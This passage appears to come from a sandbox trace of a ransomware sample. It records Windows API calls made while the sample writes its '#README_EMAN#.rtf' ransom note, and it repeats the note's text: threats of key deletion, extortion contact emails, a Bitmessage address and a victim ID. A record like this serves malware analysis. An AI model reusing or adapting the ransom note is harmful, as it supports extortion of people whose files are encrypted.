n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.307] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.307] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nÀv¤Aô\x81éwª1\x9c`\x8fºÊ\x11òÜ\"\x8dP-?Ó\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.307] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.307] CloseHandle (hObject=0x294) returned 1 [0285.308] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\#readme_eman#.rtf")) returned 0xffffffff [0285.308] GetLastError () returned 0x2 [0285.308] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\ar\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user 